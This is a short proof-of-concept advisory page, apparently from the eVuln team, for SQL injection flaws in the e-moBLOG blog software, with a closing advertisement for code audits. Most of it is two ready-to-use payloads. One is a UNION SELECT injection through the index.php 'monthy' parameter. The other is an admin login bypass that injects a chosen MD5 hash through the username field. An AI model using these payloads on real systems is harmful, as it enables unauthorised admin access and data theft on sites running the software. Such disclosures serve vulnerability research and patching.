PoC/Exploit for SQL Injection Vulnerability in e-moBLOG

Published Proof of Concept code - SQL Injection Vulnerability in e-moBLOG.

Description
Available
Solution
Not available - check vendor's website

1. SQL Inection Example

http://host/emoblog/index.php?monthy=2006017'%20union%20select%201,2,3,4,5,6,7,8,9,10/*#1

2. SQL Inection Example

link: http://host/emoblog/admin/index.php
username: aaa' union select 'bbb','[md5-hash of anypass]'/*
password: [anypass]

Order Source Code Analysis made by eVuln team

You may order source code analysis of your website made by our team.The work will be done by experts in web application security.